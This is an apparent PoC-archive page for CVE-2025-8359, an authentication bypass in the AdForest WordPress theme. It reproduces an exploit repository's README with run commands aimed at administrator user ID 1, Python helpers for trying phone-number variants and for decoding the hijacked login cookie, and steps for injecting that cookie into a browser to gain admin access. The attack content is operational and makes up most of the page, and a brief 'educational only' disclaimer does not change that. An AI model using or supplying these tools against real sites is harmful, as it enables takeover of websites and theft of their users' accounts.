Related vulnerability
Title:
WordPress plugin AdForest security vulnerability
(CVE-2025-8359)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a server running PHP and MySQL; a WordPress plugin is an add-on for it. AdForest (catalogued here as a plugin, although the vendor distributes it as a WordPress theme; see the advisory below) in versions 6.0.9 and earlier contains a security vulnerability caused by improper authentication, which can lead to authentication bypass.
Description
AdForest <= 6.0.9 - Authentication Bypass to Admin
Introduction
# CVE-2025-8359
# 🚨 AdForest <= 6.0.9 - Authentication Bypass to Admin
## 📦 Repository
> **Repo:** [Nxploited/CVE-2025-8359](https://github.com/Nxploited/CVE-2025-8359)
> **Exploit Script:** `CVE-2025-8359.py`
---
## 📋 Description
> **CVE:** CVE-2025-8359
> **Vulnerability Type:** Authentication Bypass
> **Affected Product:** [AdForest - Classified Ads WordPress Theme](https://themeforest.net/item/adforest-classified-ads-wordpress-theme/19481695)
> **Affected Versions:** Up to and including 6.0.9
> **CVSS Score:** **9.8 (Critical)**
The AdForest theme for WordPress is vulnerable to an **Authentication Bypass** in all versions up to and including 6.0.9.
Because the theme does not properly verify the user's identity during the login step that identifies an account by phone number and user ID, an unauthenticated attacker who knows a user's phone number (and can guess the user ID, typically `1` for the first administrator) can log in as **any user**, including administrators, without a password. This allows full compromise of WordPress sites using AdForest.
---
## 🛠️ Script Overview
This repository contains a Python exploit script, `CVE-2025-8359.py`, that automates the attack.
It submits the target's phone number in several spellings (leading `+`, spaces, percent-encoding) until one matches the value stored in the database, reads the user ID the server echoes back, and authenticates as the chosen user (including admin).
On success it prints the resulting WordPress login cookie, which can be used to hijack that user's session.
**Key Features:**
- Multi-variant phone format testing (`+`, spaces, percent-encoding, etc.).
- Auto-detection of user ID from server response.
- Robust session and error handling.
- Clear output with admin cookie extraction.
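The multi-variant phone testing listed above, as an added example that is not the repository's own code: a generator for the spellings of one phone number that a phone-based login form might compare against the stored value. The variant set (as supplied, digits only, E.164 `+`, `00` international prefix, original spacing, and a percent-encoded copy of each) is my assumption about what is worth trying; the repo's actual list lives in `CVE-2025-8359.py`.

```python
import re
from urllib.parse import quote


def phone_variants(phone: str) -> list:
    """Distinct spellings of one phone number to try against a login form
    that compares the submitted value with what the site stored.

    Why it matters: the stored value keeps whatever the user typed at
    registration ("+966 555 555 555", "00966...", digits only), and a bare
    '+' in an x-www-form-urlencoded body means a space, so a client that
    does not encode it delivers " 966..." to PHP; "%2B966..." survives.
    Order is most-likely first.
    """
    digits = re.sub(r"\D", "", phone)
    if not digits:
        raise ValueError("no digits in phone number: %r" % phone)

    # Keep the caller's spacing but drop everything except digits and spaces,
    # so "+966 555 555 555" also yields "966 555 555 555".
    spaced = re.sub(r"[^\d\s]", "", phone).strip()

    bases = [
        phone.strip(),          # exactly as supplied
        digits,                 # digits only
        "+" + digits,           # E.164 style
        "00" + digits,          # ITU international prefix
    ]
    if spaced != digits:
        bases += [spaced, "+" + spaced]

    variants = []
    for base in bases:
        # raw form, then the percent-encoded form ("+" -> "%2B", " " -> "%20")
        # for a server that decodes twice or an endpoint fed a raw query string
        for candidate in (base, quote(base, safe="")):
            if candidate not in variants:
                variants.append(candidate)
    return variants


if __name__ == "__main__":
    for v in phone_variants("+966 555 555 555"):
        print(v)
```

When the request is sent through `requests` with a `data=` dict, the library already percent-encodes `+` and spaces, so the encoded variants here are only useful if the body or query string is assembled by hand.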
---
## 🚀 Usage
1. **Clone the repository:**
```bash
git clone https://github.com/Nxploited/CVE-2025-8359.git
cd CVE-2025-8359
```
2. **Install dependencies:**
```bash
pip install requests
```
3. **Run the exploit script:**
```bash
python CVE-2025-8359.py -u "http://target.com/wordpress" -p "+966 555 555 555" -i 1
```
- `-u` : Base URL of the WordPress installation.
- `-p` : Target user's phone number, as stored in the WordPress database (the script also tries common reformattings of it).
- `-i` : Target user ID (e.g., `1`, which is normally the first administrator account).
- `-n` : Name value sent with the request (optional, default `test`).
4. **Show script help:**
```bash
python CVE-2025-8359.py -h
```
---
## 📦 Requirements
- Python 3.7+
- [`requests`](https://pypi.org/project/requests/)
Install via: `pip install requests`
---
## 🧾 Expected Output
- **If exploitation is successful:**
```
[+] Logged in! Cookie: wordpress_logged_in_xxxxxx=xxxxxxx
```
You have a valid WordPress authentication cookie for the target user.
- **If all formats fail:**
```
[-] All variants failed. Try other phone formats or check the database.
```
---
## 🍪 Cookie Usage
Once exploitation is successful, the script prints the recovered authentication cookie.
**How to use the cookie:**
- Copy the `wordpress_logged_in_...` value.
- Inject the cookie into your browser session (using a browser extension, or DevTools).
- Visit `/wp-admin/` on the target site. If the cookie is valid you are logged in as the target user; for an administrator account that is full admin access.
**Example (with Chrome extension):**
1. Install "EditThisCookie" or similar.
2. Add the cookie for your target site:
- Name: `wordpress_logged_in_xxxxxx`
- Value: `xxxxxxx` (as printed by the script)
3. Refresh the page for admin access.
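An added example (not from the repository) for checking the cookie the script prints before pasting it into a browser: it derives the cookie name WordPress uses for a site, pulls the `wordpress_logged_in_*` cookie out of raw `Set-Cookie` lines, and decodes the `username|expiration|token|hmac` layout so you can confirm the session belongs to the intended user and has not expired. The `Set-Cookie` lines are constructed sample data; `expected_cookie_name` assumes the URL you pass equals the site's `siteurl` option, which may not hold if WordPress is configured with a different scheme or host than the one you reached it on.

```python
import hashlib
import time
from urllib.parse import unquote


def expected_cookie_name(site_url: str) -> str:
    """Name of the WordPress login cookie for a site.

    WordPress defines COOKIEHASH as md5() of the 'siteurl' option and names
    the cookie 'wordpress_logged_in_' + COOKIEHASH. Assumption: the URL given
    here matches that option (same scheme and host, no trailing slash).
    """
    return "wordpress_logged_in_" + hashlib.md5(site_url.rstrip("/").encode()).hexdigest()


def find_logged_in_cookie(set_cookie_lines):
    """Return (name, value) of the first wordpress_logged_in_* cookie among
    raw Set-Cookie header values, or None when the login did not succeed."""
    for line in set_cookie_lines:
        name, sep, rest = line.partition("=")
        if sep and name.strip().startswith("wordpress_logged_in_"):
            return name.strip(), rest.split(";", 1)[0].strip()
    return None


def parse_logged_in_cookie(value: str, now=None) -> dict:
    """Decode a WordPress auth cookie value.

    The value is 'username|expiration|token|hmac', URL-encoded by setcookie()
    so the separators arrive as '%7C'. Four fields is the modern layout;
    anything else is treated as malformed.
    """
    fields = unquote(value).split("|")
    if len(fields) != 4:
        raise ValueError("unexpected cookie layout (%d fields)" % len(fields))
    username, expiration, token, mac = fields
    if not expiration.isdigit():
        raise ValueError("expiration is not a unix timestamp")
    now = time.time() if now is None else now
    return {
        "username": username,
        "expiration": int(expiration),
        "expired": int(expiration) <= now,
        "token": token,
        "hmac": mac,
    }


# Constructed sample: the kind of headers a successful login response carries.
# The 32 'a's stand in for the real md5 hash; token and hmac are dummies.
SAMPLE_SET_COOKIE = [
    "wordpress_test_cookie=WP%20Cookie%20check; path=/",
    "wordpress_logged_in_" + "a" * 32
    + "=admin%7C4102444800%7C0123456789abcdef%7Cfedcba9876543210; path=/; HttpOnly",
]


def check_sample(now=None) -> dict:
    """Locate and decode the login cookie in SAMPLE_SET_COOKIE."""
    found = find_logged_in_cookie(SAMPLE_SET_COOKIE)
    if found is None:
        raise RuntimeError("no login cookie: the server did not authenticate us")
    name, value = found
    info = parse_logged_in_cookie(value, now)
    info["cookie_name"] = name
    return info


if __name__ == "__main__":
    print(expected_cookie_name("http://target.com/wordpress"))
    print(check_sample())
```

If the decoded username is not the account you targeted, the server logged you in as someone else (wrong `-i`, or a phone number shared by two accounts); if `expired` is true, the cookie will be rejected and the exploit must be re-run. A quick live check is a GET to `/wp-admin/` with the cookie attached: an authenticated session gets the dashboard, an unauthenticated one is redirected to `wp-login.php`.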
---
## ⚠️ Disclaimer
This project and exploit are for **educational and authorized penetration testing purposes only**.
The author is **not responsible** for any misuse or damage caused by this exploit.
Always obtain proper permission before testing any systems.
---
## ✨ By: _**Nxploited ( Khaled Alenazi )**_
File snapshot
[4.0K] /data/pocs/1bf582defe52ee2541277fd185e22d279588ccd7
├── [3.9K] CVE-2025-8359.py
├── [1.5K] LICENSE
├── [3.5K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
Notes
1. Prefer accessing the PoC through its original source.
2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to keep it maintained long-term, please consider paying for the local POC. Thank you for your support.